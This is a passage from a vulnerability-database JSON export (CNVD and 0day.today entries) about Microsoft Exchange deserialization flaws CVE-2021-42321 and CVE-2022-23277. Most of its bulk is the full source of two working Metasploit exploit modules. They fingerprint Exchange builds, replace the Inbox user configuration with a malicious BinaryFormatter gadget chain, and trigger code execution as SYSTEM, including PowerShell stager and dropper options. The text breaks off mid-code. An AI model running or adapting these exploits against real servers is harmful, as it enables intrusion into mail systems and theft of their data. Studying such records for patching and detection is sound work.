["CVE-2021-42321"], "modified": "2021-11-24T00:00:00", "id": "CNVD-2021-90307", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-90307", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2022-02-26T21:34:50", "description": "This Metasploit module allows remote attackers to execute arbitrary code on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11 prior to Security Update 2, Exchange Server 2016 CU21 prior to Security Update 3, and Exchange Server 2016 CU22 prior to Security Update 2. Note that authentication is required to exploit this vulnerability. The specific flaw exists due to the fact that the deny list for the ChainedSerializationBinder had a typo whereby an entry was typo'd as System.Security.ClaimsPrincipal instead of the proper value of System.Security.Claims.ClaimsPrincipal. By leveraging this vulnerability, attacks can bypass the ChainedSerializationBinder's deserialization deny list and execute code as NT AUTHORITY\\SYSTEM. Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019, and Exchange Server 2016 CU22 SU0 on Windows Server 2016.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-26T00:00:00", "type": "zdt", "title": "Microsoft Exchange Server Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321"], "modified": "2022-02-26T00:00:00", "id": "1337DAY-ID-37423", "href": "https://0day.today/exploit/description/37423", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'nokogiri'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange Server ChainedSerializationBinder Deny List Typo RCE',\n 'Description' => %q{\n This vulnerability allows remote attackers to execute arbitrary code\n on Exchange Server 2019 CU10 prior to Security Update 3, Exchange Server 2019 CU11\n prior to Security Update 2, Exchange Server 2016 CU21 prior to\n Security Update 3, and Exchange Server 2016 CU22 prior to\n Security Update 2.\n\n Note that authentication is required to exploit this vulnerability.\n\n The specific flaw exists due to the fact that the deny list for the\n ChainedSerializationBinder had a typo whereby an entry was typo'd as\n System.Security.ClaimsPrincipal instead of the proper value of\n System.Security.Claims.ClaimsPrincipal.\n\n By leveraging this vulnerability, attacks can bypass the\n ChainedSerializationBinder's deserialization deny list\n and execute code as NT AUTHORITY\\SYSTEM.\n\n Tested against Exchange Server 2019 CU11 SU0 on Windows Server 2019,\n and Exchange Server 2016 CU22 SU0 on Windows Server 2016.\n },\n 'Author' => [\n 'pwnforsp', # Original Bug Discovery\n 'zcgonvh', # Of 360 noah lab, Original Bug Discovery\n 'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild\n 'Microsoft Security Response Center', # Discovery of exploitation in the wild\n 'peterjson', # Writeup\n 'testanull', # PoC Exploit\n 'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D\n ],\n 'References' => [\n ['CVE', '2021-42321'],\n ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'],\n ['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'],\n ['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'],\n ['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'],\n ['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852']\n ],\n 'DisclosureDate' => '2021-12-09',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'HttpClientTimeout' => 5,\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169\n CONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger.\n ]\n }\n )\n )\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('HttpUsername', [true, 'The username to log into the Exchange server as', '']),\n OptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server', ''])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['HttpUsername']\n end\n\n def password\n datastore['HttpPassword']\n end\n\n def vuln_builds\n # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019\n [\n [Rex::Version.new('15.1.2308.8'), Rex::Version.new('15.1.2308.20')], # Exchange Server 2016 CU21\n [Rex::Version.new('15.1.2375.7'), Rex::Version.new('15.1.2375.17')], # Exchange Server 2016 CU22\n [Rex::Version.new('15.2.922.7'), Rex::Version.new('15.2.922.19')], # Exchange Server 2019 CU10\n [Rex::Version.new('15.2.986.5'), Rex::Version.new('15.2.986.14')] # Exchange Server 2019 CU11\n ]\n end\n\n def check\n # First lets try a cheap way of doing this via a leak of the X-OWA-Version header.\n # If we get this we know the version number for sure and we can skip a lot of leg work.\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/owa/service')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.headers['X-OWA-Version']\n build = res.headers['X-OWA-Version']\n if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }\n return CheckCode::Appears(\"Exchange Server #{build} is a vulnerable build.\")\n else\n return CheckCode::Safe(\"Exchange Server #{build} is not a vulnerable build.\")\n end\n end\n\n # Next, determine if we are up against an older version of Exchange Server where\n # the /owa/auth/logon.aspx page gives the full version. Recent versions of Exchange\n # give only a partial version without the build number.\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/owa/auth/logon.aspx')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.code == 200 && ((%r{/owa/(?<build>\\d+\\.\\d+\\.\\d+\\.\\d+)} =~ res.body) || (%r{/owa/auth/(?<build>\\d+\\.\\d+\\.\\d+\\.\\d+)} =~ res.body))\n if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }\n return CheckCode::Appears(\"Exchange Server #{build} is a vulnerable build.\")\n else\n return CheckCode::Safe(\"Exchange Server #{build} is not a vulnerable build.\")\n end\n end\n\n # Next try @tseller's way and try /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\n # URL which if successful should provide some XML with entries like the following:\n #\n # <assemblyIdentity name=\"microsoft.exchange.ediscovery.exporttool.application\"\n # version=\"15.2.986.5\" publicKeyToken=\"b1d1a6c45aa418ce\" language=\"neutral\"\n # processorArchitecture=\"msil\" xmlns=\"urn:schemas-microsoft-com:asm.v1\" />\n #\n # This only works on Exchange Server 2013 and later and may not always work, but if it\n # does work it provides the full version number so its a nice strategy.\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ecp/current/exporttool/microsoft.exchange.ediscovery.exporttool.application')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.code == 200 && res.body =~ /name=\"microsoft.exchange.ediscovery.exporttool\" version=\"\\d+\\.\\d+\\.\\d+\\.\\d+\"/\n build = res.body.match(/name=\"microsoft.exchange.ediscovery.exporttool\" version=\"(\\d+\\.\\d+\\.\\d+\\.\\d+)\"/)[1]\n if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }\n return CheckCode::Appears(\"Exchange Server #{build} is a vulnerable build.\")\n else\n return CheckCode::Safe(\"Exchange Server #{build} is not a vulnerable build.\")\n end\n end\n\n # Finally, try a variation on the above and use a well known trick of grabbing /owa/auth/logon.aspx\n # to get a partial version number, then use the URL at /ecp/<version here>/exporttool/. If we get a 200\n # OK response, we found the target version number, otherwise we didn't find it.\n #\n # Props go to @jmartin-r7 for improving my original code for this and suggestion the use of\n # canonical_segments to make this close to the Rex::Version code format. Also for noticing that\n # version_range is a Rex::Version object already and cleaning up some of my original code to simplify\n # things on this premise.\n\n vuln_builds.each do |version_range|\n return CheckCode::Unknown('Range provided is not iterable') unless version_range[0].canonical_segments[0..-2] == version_range[1].canonical_segments[0..-2]\n\n prepend_range = version_range[0].canonical_segments[0..-2]\n lowest_patch = version_range[0].canonical_segments.last\n while Rex::Version.new((prepend_range.dup << lowest_patch).join('.')) <= version_range[1]\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"/ecp/#{build}/exporttool/\")\n )\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n if res && res.code == 200\n return CheckCode::Appears(\"Exchange Server #{build} is a vulnerable build.\")\n end\n\n lowest_patch += 1\n end\n\n CheckCode::Unknown('Could not determine the build number of the target Exchange Server.')\n end\n end\n\n def exploit\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # Get the user's inbox folder's ID and change key ID.\n print_status(\"Getting the user's inbox folder's ID and ChangeKey ID...\")\n xml_getfolder_inbox = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"inbox\" />\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_getfolder_inbox,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n xml_getfolder = res.get_xml_document\n xml_getfolder.remove_namespaces!\n xml_tag = xml_getfolder.xpath('//FolderId')\n if xml_tag.empty?\n fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')\n end\n unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')\n fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')\n end\n change_key_val = xml_tag.attribute('ChangeKey').value\n folder_id_val = xml_tag.attribute('Id').value\n print_good(\"ChangeKey value for Inbox folder is #{change_key_val}\")\n print_good(\"ID value for Inbox folder is #{folder_id_val}\")\n\n # Delete the user configuration object that currently on the Inbox folder.\n print_status('Deleting the user configuration object associated with Inbox folder...')\n xml_delete_inbox_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:DeleteUserConfiguration>\n <m:UserConfigurationName Name=\"ExtensionMasterTable\">\n <t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" />\n </m:UserConfigurationName>\n </m:DeleteUserConfiguration>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_delete_inbox_user_config,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n if res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>}\n print_good('Successfully deleted the user configuration object associated with the Inbox folder!')\n else\n print_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!')\n print_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!')\n end\n\n # Now to replace the deleted user configuration object with our own user configuration object.\n print_status('Creating the malicious user configuration object on the Inbox folder!')\n\n gadget_chain = Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: :ClaimsPrincipal, formatter: :BinaryFormatter))\n xml_malicious_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:CreateUserConfiguration>\n <m:UserConfiguration>\n <t:UserConfigurationName Name=\"ExtensionMasterTable\">\n <t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" />\n </t:UserConfigurationName>\n <t:Dictionary>\n <t:DictionaryEntry>\n <t:DictionaryKey>\n <t:Type>String</t:Type>\n <t:Value>OrgChkTm</t:Value>\n </t:DictionaryKey>\n <t:DictionaryValue>\n <t:Type>Integer64</t:Type>\n <t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value>\n </t:DictionaryValue>\n </t:DictionaryEntry>\n <t:DictionaryEntry>\n <t:DictionaryKey>\n <t:Type>String</t:Type>\n <t:Value>OrgDO</t:Value>\n </t:DictionaryKey>\n <t:DictionaryValue>\n <t:Type>Boolean</t:Type>\n <t:Value>false</t:Value>\n </t:DictionaryValue>\n </t:DictionaryEntry>\n </t:Dictionary>\n <t:BinaryData>#{gadget_chain}</t:BinaryData>\n </m:UserConfiguration>\n </m:CreateUserConfiguration>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_malicious_user_config,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n unless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>}\n fail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!')\n end\n\n print_good('Successfully created the malicious user configuration object and associated with the Inbox folder!')\n\n # Deserialize our object. If all goes well, you should now have SYSTEM :)\n print_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...')\n xml_get_client_access_token = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:GetClientAccessToken>\n <m:TokenRequests>\n <t:TokenRequest>\n <t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id>\n <t:TokenType>CallerIdentity</t:TokenType>\n </t:TokenRequest>\n </m:TokenRequests>\n </m:GetClientAccessToken>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_get_client_access_token,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n unless res.body =~ %r{<e:Message xmlns:e=\"http://schemas.microsoft.com/exchange/services/2006/errors\">An internal server error occurred. The operation failed.</e:Message>}\n fail_with(Failure::UnexpectedReply, 'Did not recieve the expected internal server error upon deserialization!')\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/37423", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-22T20:06:58", "description": "This Metasploit module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU. Note that authentication is required to exploit these vulnerabilities.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-22T00:00:00", "type": "zdt", "title": "Microsoft Exchange Server ChainedSerializationBinder Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321", "CVE-2022-23277"], "modified": "2022-08-22T00:00:00", "id": "1337DAY-ID-37920", "href": "https://0day.today/exploit/description/37920", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'nokogiri'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HTTP::Exchange\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange Server ChainedSerializationBinder RCE',\n 'Description' => %q{\n This module exploits vulnerabilities within the ChainedSerializationBinder as used in\n Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and\n Exchange Server 2016 CU22 all prior to Mar22SU.\n\n Note that authentication is required to exploit these vulnerabilities.\n },\n 'Author' => [\n 'pwnforsp', # Original Bug Discovery\n 'zcgonvh', # Of 360 noah lab, Original Bug Discovery\n 'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild\n 'Microsoft Security Response Center', # Discovery of exploitation in the wild\n 'peterjson', # Writeup\n 'testanull', # PoC Exploit\n 'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D\n 'Spencer McIntyre', # CVE-2022-23277 support and DataSet gadget chains\n 'Markus Wulftange' # CVE-2022-23277 research\n ],\n 'References' => [\n # CVE-2021-42321 references\n ['CVE', '2021-42321'],\n ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'],\n ['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'],\n ['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'],\n ['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'],\n ['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852'],\n # CVE-2022-23277 references\n ['CVE', '2022-23277'],\n ['URL', 'https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html'],\n ['URL', 'https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c']\n ],\n 'DisclosureDate' => '2021-12-09',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'HttpClientTimeout' => 5,\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169\n CONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger.\n ]\n }\n )\n )\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('HttpUsername', [true, 'The username to log into the Exchange server as']),\n OptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['HttpUsername']\n end\n\n def password\n datastore['HttpPassword']\n end\n\n def cve_2021_42321_vuln_builds\n # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019\n [\n '15.1.2308.8', '15.1.2308.14', '15.1.2308.15', # Exchange Server 2016 CU21\n '15.1.2375.7', '15.1.2375.12', # Exchange Server 2016 CU22\n '15.2.922.7', '15.2.922.13', '15.2.922.14', # Exchange Server 2019 CU10\n '15.2.986.5', '15.2.986.9' # Exchange Server 2019 CU11\n ]\n end\n\n def cve_2022_23277_vuln_builds\n # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019\n [\n '15.1.2308.20', # Exchange Server 2016 CU21 Nov21SU\n '15.1.2308.21', # Exchange Server 2016 CU21 Jan22SU\n '15.1.2375.17', # Exchange Server 2016 CU22 Nov21SU\n '15.1.2375.18', # Exchange Server 2016 CU22 Jan22SU\n '15.2.922.19', # Exchange Server 2019 CU10 Nov21SU\n '15.2.922.20', # Exchange Server 2019 CU10 Jan22SU\n '15.2.986.14', # Exchange Server 2019 CU11 Nov21SU\n '15.2.986.15' # Exchange Server 2019 CU11 Jan22SU\n ]\n end\n\n def check\n # Note we are only checking official releases here to reduce requests when checking versions with exchange_get_version\n current_build_rex = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)\n if current_build_rex.nil?\n return CheckCode::Unknown(\"Couldn't retrieve the target Exchange Server version!\")\n end\n\n @exchange_build = current_build_rex.to_s\n\n if cve_2021_42321_vuln_builds.include?(@exchange_build)\n CheckCode::Appears(\"Exchange Server #{@exchange_build} is vulnerable to CVE-2021-42321\")\n elsif cve_2022_23277_vuln_builds.include?(@exchange_build)\n CheckCode::Appears(\"Exchange Server #{@exchange_build} is vulnerable to CVE-2022-23277\")\n else\n CheckCode::Safe(\"Exchange Server #{@exchange_build} does not appear to be a vulnerable version!\")\n end\n end\n\n def exploit\n if @exchange_build.nil? # make sure the target build is known and if it's not (because the check was skipped), get it\n @exchange_build = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)&.to_s\n if @exchange_build.nil?\n fail_with(Failure::Unknown, 'Failed to identify the target Exchange Server build version.')\n end\n end\n\n if cve_2021_42321_vuln_builds.include?(@exchange_build)\n @gadget_chain = :ClaimsPrincipal\n elsif cve_2022_23277_vuln_builds.include?(@exchange_build)\n @gadget_chain = :DataSetTypeSpoof\n else\n fail_with(Failure::NotVulnerable, \"Exchange Server #{@exchange_build} is not a vulnerable version!\")\n end\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # Get the user's inbox folder's ID and change key ID.\n print_status(\"Getting the user's inbox folder's ID and ChangeKey ID...\")\n xml_getfolder_inbox = %(<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Header>\n <t:RequestServerVersion Version=\"Exchange2013\" />\n </soap:Header>\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"inbox\" />\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>)\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'),\n 'data' => xml_getfolder_inbox,\n 'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about.\n }\n )\n fail_with(Failure::Unreachable, 'Connection failed') if res.nil?\n\n unless res&.body\n fail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!')\n end\n\n if res.code == 401\n fail_with(Failure::NoAccess, \"Server responded with 401 Unauthorized for user: #{datastore['DOMAIN']}\\\\#{username}\")\n end\n\n xml_getfolder = res.get_xml_document\n xml_getfolder.remove_namespaces!\n xml_tag = xml_getfolder.xpath('//FolderId')\n if xml_tag.empty?\n print_error('Are you sure the current user has logged in previously to set up their mailbox? It seems they may have not had a mailbox set up yet!')\n fail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!')\n end\n unless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey')\n fail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!')\n end\n change_key_val = 